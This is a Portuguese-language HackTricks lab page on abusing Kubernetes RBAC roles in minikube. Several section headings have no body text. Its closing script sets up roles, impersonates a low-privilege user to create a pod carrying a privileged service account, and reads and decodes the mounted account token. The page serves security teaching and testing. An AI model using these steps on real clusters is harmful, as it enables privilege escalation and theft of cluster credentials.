Kubernetes Roles Abuse Lab

PreviousPod Escape Privileges NextKubernetes Namespace Escalation

Last updated 3 days ago

Kubernetes Roles Abuse Lab

Aprenda e pratique Hacking AWS: Aprenda e pratique Hacking GCP:

Support HackTricks

Confira os !
Junte-se ao 💬 ou ao ou siga-nos no Twitter 🐦 .
Compartilhe truques de hacking enviando PRs para os repositórios do e .

Você pode executar esses laboratórios apenas dentro do minikube.

Criação de Pod -> Escalar para SAs de ns

Vamos criar:

Uma conta de serviço "test-sa" com privilégio de cluster para ler segredos
Um ClusterRole "test-cr" e um ClusterRoleBinding "test-crb" serão criados
Permissões para listar e criar pods para um usuário chamado "Test" serão concedidas
Um Role "test-r" e RoleBinding "test-rb" serão criados
Em seguida, vamos confirmar que a SA pode listar segredos e que o usuário Test pode listar pods
Finalmente, vamos impersonar o usuário Test para criar um pod que inclui a SA test-sa e roubar o token da conta de serviço.
Esta é a maneira de mostrar que o usuário poderia escalar privilégios dessa forma

Para criar o cenário, uma conta de administrador é usada. Além disso, para exfiltrar o token da sa neste exemplo, a conta de administrador é usada para executar dentro do pod criado. No entanto, como explicado aqui, a declaração do pod poderia conter a exfiltração do token, então o privilégio de "exec" não é necessário para exfiltrar o token, a permissão de "criar" é suficiente.

Criar Daemonset

Patch Daemonset

Neste caso, vamos patchar um daemonset para fazer com que seu pod carregue nossa conta de serviço desejada.

Se seu usuário tiver o verbo update em vez de patch, isso não funcionará.

Não funciona

Criar/Patch Bindings

Não funciona:

Criar um novo RoleBinding apenas com o verbo create
Criar um novo RoleBinding apenas com o verbo patch (você precisa ter as permissões de binding)
Você não pode fazer isso para atribuir o papel a si mesmo ou a um SA diferente
Modificar um novo RoleBinding apenas com o verbo patch (você precisa ter as permissões de binding)
Você não pode fazer isso para atribuir o papel a si mesmo ou a um SA diferente

Bind explicitly Bindings

Criação de papéis arbitrários

Neste exemplo, tentamos criar um papel com as permissões de criar e acessar os recursos de papéis. No entanto, o K8s nos impede de criar um papel com mais permissões do que o principal que está criando possui:

Suporte ao HackTricks

PreviousPod Escape Privileges NextKubernetes Namespace Escalation

Last updated 3 days ago

# Create Service Account test-sa # Create role and rolebinding to give list and create permissions over pods in default namespace to user Test # Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere echo 'apiVersion: v1 kind: ServiceAccount metadata: name: test-sa --- kind: Role apiVersion: rbac.authorization.k8s.io/v1 metadata: name: test-r rules: - apiGroups: [""] resources: ["pods"] verbs: ["get", "list", "delete", "patch", "create"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: test-rb subjects: - kind: ServiceAccount name: test-sa - kind: User name: Test roleRef: kind: Role name: test-r apiGroup: rbac.authorization.k8s.io --- kind: ClusterRole apiVersion: rbac.authorization.k8s.io/v1 metadata: name: test-cr rules: - apiGroups: [""] resources: ["secrets"] verbs: ["get", "list", "delete", "patch", "create"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: test-crb subjects: - kind: ServiceAccount namespace: default name: test-sa apiGroup: "" roleRef: kind: ClusterRole name: test-cr apiGroup: rbac.authorization.k8s.io' | kubectl apply -f - # Check test-sa can access kube-system secrets kubectl --as system:serviceaccount:default:test-sa -n kube-system get secrets # Check user User can get pods in namespace default kubectl --as Test -n default get pods # Create a pod as user Test with the SA test-sa (privesc step) echo "apiVersion: v1 kind: Pod metadata: name: test-pod namespace: default spec: containers: - name: alpine image: alpine command: ['/bin/sh'] args: ['-c', 'sleep 100000'] serviceAccountName: test-sa automountServiceAccountToken: true hostNetwork: true"| kubectl --as Test apply -f - # Connect to the pod created an confirm the attached SA token belongs to test-sa kubectl exec -ti -n default test-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d # Clean the scenario kubectl delete pod test-pod kubectl delete clusterrolebinding test-crb kubectl delete clusterrole test-cr kubectl delete rolebinding test-rb kubectl delete role test-r kubectl delete serviceaccount test-sa